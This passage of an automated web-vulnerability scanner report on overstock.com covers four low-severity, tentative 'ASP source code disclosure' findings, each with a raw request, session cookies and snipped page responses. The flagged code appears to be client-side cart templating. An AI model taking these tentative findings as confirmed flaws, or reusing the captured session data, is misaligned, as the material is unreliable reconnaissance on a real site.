<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.17. http://www.overstock.com/cart  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /cart

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /cart HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:38 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:38 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:38 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.c
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...

4.18. http://www.overstock.com/intlcountryselect  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /intlcountryselect

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /intlcountryselect HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 180841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.co
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...

4.19. http://www.overstock.com/myrecommendations  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /myrecommendations

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /myrecommendations HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:39 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:39 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:39 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 46411


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->
<html>
<head>
<!--Page-specific
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...

4.20. http://www.overstock.com/shipping-information/11971/static.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /shipping-information/11971/static.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /shipping-information/11971/static.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:41 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:44 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:44 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 1108421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<!--End Element SITE_DOCTYPE-->

<!--Page-specific title and meta data-->
<title>Shippin
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
